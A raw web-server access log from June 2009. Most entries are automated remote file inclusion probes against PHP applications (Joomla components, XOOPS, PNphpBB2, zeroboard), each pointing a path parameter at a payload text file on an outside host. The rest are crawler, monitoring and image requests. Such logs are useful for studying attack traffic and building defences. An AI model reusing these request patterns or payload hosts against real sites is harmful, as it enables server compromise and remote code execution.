216.246.98.115 - - [28/Jun/2009:06:59:22 -0400] "GET /logs/access_log.Q109053100//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:06:59:22 -0400] "GET /logs/access_log.Q109053100//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
218.234.21.178 - - [28/Jun/2009:06:59:41 -0400] "GET /logs/access_log.Q109052300//include/lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
78.46.7.41 - - [28/Jun/2009:06:59:47 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.leensysteem.nl//cmdstate.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
78.46.7.41 - - [28/Jun/2009:06:59:47 -0400] "GET /?sourcedir=http://www.leensysteem.nl//cmdstate.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
78.46.7.41 - - [28/Jun/2009:06:59:47 -0400] "GET /logs/?sourcedir=http://www.leensysteem.nl//cmdstate.txt? HTTP/1.1" 200 7314 "-" "libwww-perl/5.805"
78.46.7.41 - - [28/Jun/2009:07:00:22 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.leensysteem.nl//cmdstate.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
210.205.57.2 - - [28/Jun/2009:07:00:47 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
210.205.57.2 - - [28/Jun/2009:07:00:48 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
210.205.57.2 - - [28/Jun/2009:07:00:49 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
217.147.29.190 - - [28/Jun/2009:07:00:59 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:00:59 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:00:59 -0400] "GET /logs/access_log.Q109051200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:01:04 -0400] "GET /logs/access_log.Q109052500//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.234.21.178 - - [28/Jun/2009:07:01:12 -0400] "GET /logs/access_log.Q109052300//include/lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
86.39.131.85 - - [28/Jun/2009:07:01:59 -0400] "GET /logs/access_log.Q109051200%20%20/default.php?page=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
86.39.131.85 - - [28/Jun/2009:07:01:59 -0400] "GET /default.php?page=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
86.39.131.85 - - [28/Jun/2009:07:01:59 -0400] "GET /logs/default.php?page=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
86.39.131.85 - - [28/Jun/2009:07:01:59 -0400] "GET /logs/access_log.Q109052400%20%20/default.php?page=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
81.169.149.193 - - [28/Jun/2009:07:02:44 -0400] "GET //main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.169.149.193 - - [28/Jun/2009:07:02:46 -0400] "GET /logs//main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:02:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.172 - - [28/Jun/2009:07:03:26 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.142.179 - - [28/Jun/2009:07:03:21 -0400] "GET /logs/access_log.Q109060400 HTTP/1.0" 200 4467320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.147.29.190 - - [28/Jun/2009:07:03:39 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:03:39 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.249.71.172 - - [28/Jun/2009:07:03:26 -0400] "GET /logs/access_log.Q109060100 HTTP/1.1" 200 4231911 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.250.86.136 - - [28/Jun/2009:07:04:43 -0400] "GET //main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
61.250.86.136 - - [28/Jun/2009:07:04:46 -0400] "GET /logs//main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:07:07:42 -0400] "GET /logs//bbs/outlogin.php?_zb_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:07:07:42 -0400] "GET //bbs/outlogin.php?_zb_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:07:07:42 -0400] "GET /logs/access_log.Q109051900//bbs/outlogin.php?_zb_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:07:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.205.57.2 - - [28/Jun/2009:07:08:12 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
210.205.57.2 - - [28/Jun/2009:07:08:13 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
210.205.57.2 - - [28/Jun/2009:07:08:14 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
66.249.71.16 - - [28/Jun/2009:07:09:12 -0400] "GET /images/items/0116025_full.jpg HTTP/1.1" 200 6195 "-" "Googlebot-Image/1.0"
83.13.191.186 - - [28/Jun/2009:07:09:16 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:07:09:22 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:07:09:26 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.30.100.97 - - [28/Jun/2009:07:09:33 -0400] "GET //main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.30.100.97 - - [28/Jun/2009:07:09:33 -0400] "GET /logs/access_log.Q109051900//main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.30.100.97 - - [28/Jun/2009:07:09:33 -0400] "GET /logs//main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.30.100.97 - - [28/Jun/2009:07:09:34 -0400] "GET /logs/access_log.Q109050700//main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:07:09:50 -0400] "GET /logs/error_log.Q108110500 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.13.191.186 - - [28/Jun/2009:07:10:18 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
67.215.238.186 - - [28/Jun/2009:07:10:38 -0400] "GET /logs/index.php HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
210.205.57.2 - - [28/Jun/2009:07:11:46 -0400] "GET /logs/access_log.Q109051600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
216.75.60.116 - - [28/Jun/2009:07:12:41 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:12:41 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:12:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.242.165.138 - - [28/Jun/2009:07:13:09 -0400] "GET /logs/access_log.Q109051100//index.php?_SERVER[DOCUMENT_ROOT]=http://www.suntalent.com.tw/appserv/id???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
123.242.165.138 - - [28/Jun/2009:07:13:09 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.suntalent.com.tw/appserv/id???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
123.242.165.138 - - [28/Jun/2009:07:13:19 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.suntalent.com.tw/appserv/id???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
216.75.60.116 - - [28/Jun/2009:07:13:59 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:13:59 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.39.131.85 - - [28/Jun/2009:07:15:10 -0400] "GET /logs/access_log.Q109052400/default.php?page=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
86.39.131.85 - - [28/Jun/2009:07:15:10 -0400] "GET /logs/access_log.Q109051200/default.php?page=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:07:15:21 -0400] "GET /include/print_category.php?setup[use_category]=1&dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:07:15:21 -0400] "GET /logs/include/print_category.php?setup[use_category]=1&dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:07:15:21 -0400] "GET /logs/access_log.Q109051100%20%20/include/print_category.php?setup[use_category]=1&dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:15:32 -0400] "GET //components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:15:32 -0400] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:15:32 -0400] "GET /logs/access_log.Q109052800//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:14 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:14 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:14 -0400] "GET /logs/access_log.Q109061000%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:26 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:07:17:33 -0400] "GET /logs/access_log.Q109051600%20%20/include/print_category.php?setup[use_category]=1&dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:46 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:46 -0400] "GET /logs/access_log.Q109061000%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:46 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:17:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [28/Jun/2009:07:17:53 -0400] "GET /logs/access_log.Q109052800%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:53 -0400] "GET /logs/access_log.Q109061000%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:53 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:53 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:55 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:17:59 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:18:15 -0400] "GET //components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:18:15 -0400] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:18:15 -0400] "GET /logs/access_log.Q109061100//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:18:47 -0400] "GET /logs/access_log.Q109051900//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:07:20:02 -0400] "GET /logs/access_log.Q109051900//bbs/outlogin.php?_zb_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:07:20:02 -0400] "GET /logs//bbs/outlogin.php?_zb_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:07:20:02 -0400] "GET //bbs/outlogin.php?_zb_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:20:05 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:20:51 -0400] "GET /logs/access_log.Q109051900%20%20//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:21:38 -0400] "GET //bbs/outlogin.php?_zb_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:21:38 -0400] "GET /logs//bbs/outlogin.php?_zb_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:21:38 -0400] "GET /logs/access_log.Q109051900//bbs/outlogin.php?_zb_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:07:21:40 -0400] "GET /images/items/682435_full.jpg HTTP/1.1" 200 5297 "-" "Googlebot-Image/1.0"
209.51.133.202 - - [28/Jun/2009:07:21:45 -0400] "GET //bbs/outlogin.php?_zb_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:21:45 -0400] "GET /logs//bbs/outlogin.php?_zb_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:21:45 -0400] "GET /logs/access_log.Q109051900//bbs/outlogin.php?_zb_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:07:21:52 -0400] "GET /logs/error_log.Q108050900 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.246.98.115 - - [28/Jun/2009:07:22:27 -0400] "GET /logs/access_log.Q109061000//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:22:30 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:07:22:45 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:07:22:45 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:07:22:46 -0400] "GET //include/mail.inc.php?skin_board_path=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:22:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.131.116.12 - - [28/Jun/2009:07:23:04 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:24:22 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:24:22 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:24:22 -0400] "GET /logs/access_log.Q109061000//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:24:22 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.5.136 - - [28/Jun/2009:07:26:23 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.100.5.136 - - [28/Jun/2009:07:26:23 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.100.5.136 - - [28/Jun/2009:07:26:23 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:07:27:26 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:07:27:33 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:27:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.246.98.115 - - [28/Jun/2009:07:28:24 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:28:24 -0400] "GET /logs/access_log.Q109061000//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.146.35.145 - - [28/Jun/2009:07:29:18 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:29:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:29:20 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
